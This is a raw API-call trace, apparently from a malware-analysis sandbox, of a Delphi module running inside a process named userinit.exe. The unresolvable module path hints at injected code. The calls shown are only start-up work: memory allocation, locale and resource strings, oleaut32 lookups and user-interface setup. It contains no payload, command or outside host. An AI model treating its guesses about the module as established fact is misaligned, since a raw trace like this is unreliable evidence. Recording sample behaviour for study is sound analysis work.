[0119.376] GlobalReAlloc (hMem=0x146000c, dwBytes=0xf4000, uFlags=0x2) returned 0x146000c
[0119.449] GlobalLock (hMem=0x146000c) returned 0x2820020
[0119.450] GlobalHandle (pMem=0x2820020) returned 0x146000c
[0119.450] GlobalUnlock (hMem=0x146000c) returned 0
[0119.450] GlobalReAlloc (hMem=0x146000c, dwBytes=0xf6000, uFlags=0x2) returned 0x146000c
[0119.470] GlobalLock (hMem=0x146000c) returned 0x2720020
[0119.471] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0119.471] GlobalUnlock (hMem=0x146000c) returned 0
[0119.471] GlobalReAlloc (hMem=0x146000c, dwBytes=0xf8000, uFlags=0x2) returned 0x146000c
[0119.538] GlobalLock (hMem=0x146000c) returned 0x2820020
[0119.539] GlobalHandle (pMem=0x2820020) returned 0x146000c
[0119.539] GlobalUnlock (hMem=0x146000c) returned 0
[0119.539] GlobalReAlloc (hMem=0x146000c, dwBytes=0xfa000, uFlags=0x2) returned 0x146000c
[0119.559] GlobalLock (hMem=0x146000c) returned 0x2720020
[0119.560] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0119.560] GlobalUnlock (hMem=0x146000c) returned 0
[0119.560] GlobalReAlloc (hMem=0x146000c, dwBytes=0xfc000, uFlags=0x2) returned 0x146000c
[0119.581] GlobalLock (hMem=0x146000c) returned 0x2820020
[0119.582] GlobalHandle (pMem=0x2820020) returned 0x146000c
[0119.582] GlobalUnlock (hMem=0x146000c) returned 0
[0119.582] GlobalReAlloc (hMem=0x146000c, dwBytes=0xfe000, uFlags=0x2) returned 0x146000c
[0119.650] GlobalLock (hMem=0x146000c) returned 0x2720020
[0119.651] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0119.651] GlobalUnlock (hMem=0x146000c) returned 0
[0119.652] GlobalReAlloc (hMem=0x146000c, dwBytes=0x100000, uFlags=0x2) returned 0x146000c
[0119.676] GlobalLock (hMem=0x146000c) returned 0x2820020
[0119.723] GlobalHandle (pMem=0x2820020) returned 0x146000c
[0119.723] GlobalUnlock (hMem=0x146000c) returned 0
[0119.723] GlobalReAlloc (hMem=0x146000c, dwBytes=0x102000, uFlags=0x2) returned 0x146000c
[0119.745] GlobalLock (hMem=0x146000c) returned 0x2930020
[0119.746] GlobalHandle (pMem=0x2930020) returned 0x146000c
[0119.746] GlobalUnlock (hMem=0x146000c) returned 0
[0119.746] GlobalReAlloc (hMem=0x146000c, dwBytes=0x104000, uFlags=0x2) returned 0x146000c
[0119.813] GlobalLock (hMem=0x146000c) returned 0x2720020
[0119.813] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0119.813] GlobalUnlock (hMem=0x146000c) returned 0
[0119.814] GlobalReAlloc (hMem=0x146000c, dwBytes=0x106000, uFlags=0x2) returned 0x146000c
[0119.836] GlobalLock (hMem=0x146000c) returned 0x2830020
[0119.836] GlobalHandle (pMem=0x2830020) returned 0x146000c
[0119.836] GlobalUnlock (hMem=0x146000c) returned 0
[0119.836] GlobalReAlloc (hMem=0x146000c, dwBytes=0x108000, uFlags=0x2) returned 0x146000c
[0119.905] GlobalLock (hMem=0x146000c) returned 0x2720020
[0119.906] GlobalHandle (pMem=0x2720020) returned 0x146000c
[0119.906] GlobalUnlock (hMem=0x146000c) returned 0
[0119.906] GlobalReAlloc (hMem=0x146000c, dwBytes=0x10a000, uFlags=0x2) returned 0x146000c
[0119.929] GlobalLock (hMem=0x146000c) returned 0x2830020
[0119.930] GlobalHandle (pMem=0x2830020) returned 0x146000c
[0119.930] GlobalUnlock (hMem=0x146000c) returned 0
[0119.930] GlobalReAlloc (hMem=0x146000c, dwBytes=0x10c000, uFlags=0x2) returned 0x146000c
[0120.007] GlobalLock (hMem=0x146000c) returned 0x2720020
[0120.007] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2830000
[0120.007] VirtualAlloc (lpAddress=0x2830000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2830000
[0120.096] GetKeyboardType (nTypeFlag=0) returned 4
[0120.096] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0120.096] GetStartupInfoA (in: lpStartupInfo=0x1af2f8 | out: lpStartupInfo=0x1af2f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0120.096] GetVersion () returned 0x1db10106
[0120.096] GetVersion () returned 0x1db10106
[0120.096] GetCurrentThreadId () returned 0xfcc
[0120.096] GetModuleFileNameA (in: hModule=0x2940000, lpFilename=0x1aedf4, nSize=0x105 | out: lpFilename="\x04î\x1a" (normalized: "c:\\windows\\system32\\\x04î\x1a")) returned 0x0
[0120.096] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1aeccf, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.096] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1aede4 | out: phkResult=0x1aede4*=0x0) returned 0x2
[0120.096] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1aede4 | out: phkResult=0x1aede4*=0x0) returned 0x2
[0120.096] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x1aede4 | out: phkResult=0x1aede4*=0x0) returned 0x2
[0120.096] lstrcpynA (in: lpString1=0x1aeccf, lpString2="\x04î\x1a", iMaxLength=261 | out: lpString1="\x04î\x1a") returned="\x04î\x1a"
[0120.096] GetThreadLocale () returned 0x409
[0120.096] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x1aeddf, cchData=5 | out: lpLCData="ENU") returned 4
[0120.096] lstrlenA (lpString="\x04î\x1a") returned 3
[0120.096] LoadStringA (in: hInstance=0x2940000, uID=0xffc4, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0120.096] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x2adcc0
[0120.096] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x2a60000
[0120.096] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x2aecc0
[0120.096] VirtualAlloc (lpAddress=0x2a60000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a60000
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffc3, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffc1, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffc2, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffd4, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffdd, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffd3, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffd0, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffd7, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffd6, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffe8, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffe9, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffea, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffe7, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffe5, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffe3, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffe2, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffe1, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffe0, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xffff, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xfffe, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xfffd, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xfffc, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xfffb, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xfffa, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xfff9, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xfff8, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xfff7, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0120.097] LoadStringA (in: hInstance=0x2940000, uID=0xfff6, lpBuffer=0x1aef18, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0120.098] LoadStringA (in: hInstance=0x2940000, uID=0xfff4, lpBuffer=0x1aef04, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0120.098] LoadStringA (in: hInstance=0x2940000, uID=0xffe4, lpBuffer=0x1aef04, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0120.098] GetVersionExA (in: lpVersionInformation=0x1af29c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2940000, dwMinorVersion=0x0, dwBuildNumber=0x28, dwPlatformId=0x65636341, szCSDVersion="ssibleObjectFromr<\x94\x02·\"\x94\x024ó\x1a") | out: lpVersionInformation=0x1af29c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0120.098] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.098] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0120.098] GetThreadLocale () returned 0x409
[0120.098] GetThreadLocale () returned 0x409
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x1af174, cchData=256 | out: lpLCData="Jan") returned 4
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x1af174, cchData=256 | out: lpLCData="January") returned 8
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x1af174, cchData=256 | out: lpLCData="Feb") returned 4
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x1af174, cchData=256 | out: lpLCData="February") returned 9
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x1af174, cchData=256 | out: lpLCData="Mar") returned 4
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x1af174, cchData=256 | out: lpLCData="March") returned 6
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x1af174, cchData=256 | out: lpLCData="Apr") returned 4
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x1af174, cchData=256 | out: lpLCData="April") returned 6
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x1af174, cchData=256 | out: lpLCData="May") returned 4
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x1af174, cchData=256 | out: lpLCData="May") returned 4
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x1af174, cchData=256 | out: lpLCData="Jun") returned 4
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x1af174, cchData=256 | out: lpLCData="June") returned 5
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x1af174, cchData=256 | out: lpLCData="Jul") returned 4
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x1af174, cchData=256 | out: lpLCData="July") returned 5
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x1af174, cchData=256 | out: lpLCData="Aug") returned 4
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x1af174, cchData=256 | out: lpLCData="August") returned 7
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x1af174, cchData=256 | out: lpLCData="Sep") returned 4
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x1af174, cchData=256 | out: lpLCData="September") returned 10
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x1af174, cchData=256 | out: lpLCData="Oct") returned 4
[0120.098] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x1af174, cchData=256 | out: lpLCData="October") returned 8
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x1af174, cchData=256 | out: lpLCData="Nov") returned 4
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x1af174, cchData=256 | out: lpLCData="November") returned 9
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x1af174, cchData=256 | out: lpLCData="Dec") returned 4
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x1af174, cchData=256 | out: lpLCData="December") returned 9
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x1af174, cchData=256 | out: lpLCData="Sun") returned 4
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x1af174, cchData=256 | out: lpLCData="Sunday") returned 7
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x1af174, cchData=256 | out: lpLCData="Mon") returned 4
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x1af174, cchData=256 | out: lpLCData="Monday") returned 7
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x1af174, cchData=256 | out: lpLCData="Tue") returned 4
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x1af174, cchData=256 | out: lpLCData="Tuesday") returned 8
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x1af174, cchData=256 | out: lpLCData="Wed") returned 4
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x1af174, cchData=256 | out: lpLCData="Wednesday") returned 10
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x1af174, cchData=256 | out: lpLCData="Thu") returned 4
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x1af174, cchData=256 | out: lpLCData="Thursday") returned 9
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x1af174, cchData=256 | out: lpLCData="Fri") returned 4
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x1af174, cchData=256 | out: lpLCData="Friday") returned 7
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x1af174, cchData=256 | out: lpLCData="Sat") returned 4
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x1af174, cchData=256 | out: lpLCData="Saturday") returned 9
[0120.099] GetThreadLocale () returned 0x409
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x1af1d0, cchData=256 | out: lpLCData="$") returned 2
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x1af1d0, cchData=256 | out: lpLCData="0") returned 2
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x1af1d0, cchData=256 | out: lpLCData="0") returned 2
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x1af2c8, cchData=2 | out: lpLCData=",") returned 2
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x1af2c8, cchData=2 | out: lpLCData=".") returned 2
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x1af1d0, cchData=256 | out: lpLCData="2") returned 2
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x1af2c8, cchData=2 | out: lpLCData="/") returned 2
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x1af1d0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0120.099] GetThreadLocale () returned 0x409
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x1af19c, cchData=256 | out: lpLCData="1") returned 2
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x1af1d0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0120.099] GetThreadLocale () returned 0x409
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x1af19c, cchData=256 | out: lpLCData="1") returned 2
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x1af2c8, cchData=2 | out: lpLCData=":") returned 2
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x1af1d0, cchData=256 | out: lpLCData="AM") returned 3
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x1af1d0, cchData=256 | out: lpLCData="PM") returned 3
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x1af1d0, cchData=256 | out: lpLCData="0") returned 2
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x1af1d0, cchData=256 | out: lpLCData="0") returned 2
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x1af1d0, cchData=256 | out: lpLCData="0") returned 2
[0120.099] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x1af2c8, cchData=2 | out: lpLCData=",") returned 2
[0120.099] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0120.100] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0120.100] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0120.100] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0120.100] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0120.100] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0120.100] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0120.100] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0120.100] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0120.100] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0120.100] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0120.100] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0120.100] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0120.101] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0120.101] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0120.101] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0120.101] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0120.101] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0120.101] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0120.101] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0120.101] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0120.101] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0120.101] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0120.101] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0120.101] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0120.101] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0120.102] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0120.102] GetDC (hWnd=0x0) returned 0x1801089c
[0120.102] GetDeviceCaps (hdc=0x1801089c, index=90) returned 96
[0120.102] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.102] GetDC (hWnd=0x0) returned 0x1801089c
[0120.102] GetDeviceCaps (hdc=0x1801089c, index=104) returned 0
[0120.102] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.102] CreatePalette (plpal=0x1aef2c) returned 0x8d08084a
[0120.102] GetStockObject (i=7) returned 0x1b00017
[0120.102] GetStockObject (i=5) returned 0x1900015
[0120.102] GetStockObject (i=13) returned 0x18a002e
[0120.102] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0120.102] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0120.102] LoadStringA (in: hInstance=0x2940000, uID=0xff3d, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0120.102] LoadStringA (in: hInstance=0x2940000, uID=0xff3c, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0120.102] LoadStringA (in: hInstance=0x2940000, uID=0xff3b, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0120.102] LoadStringA (in: hInstance=0x2940000, uID=0xff3a, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0120.102] LoadStringA (in: hInstance=0x2940000, uID=0xff39, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xff38, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xff37, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xff36, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xff35, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xff34, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xff33, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xff32, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xff31, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xff30, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xff4f, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xff4e, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xff4d, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xff4c, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0120.103] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0120.103] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0120.103] GetCurrentThreadId () returned 0xfcc
[0120.103] GlobalAddAtomA (lpString="WndProcPtr0294000000000FCC") returned 0xc136
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xfefc, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xfefb, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xfefa, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xfef9, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xfef8, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xfef7, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0120.103] LoadStringA (in: hInstance=0x2940000, uID=0xfef6, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xfef5, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xfef4, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xfef3, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xfef2, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xfef1, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xfef0, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
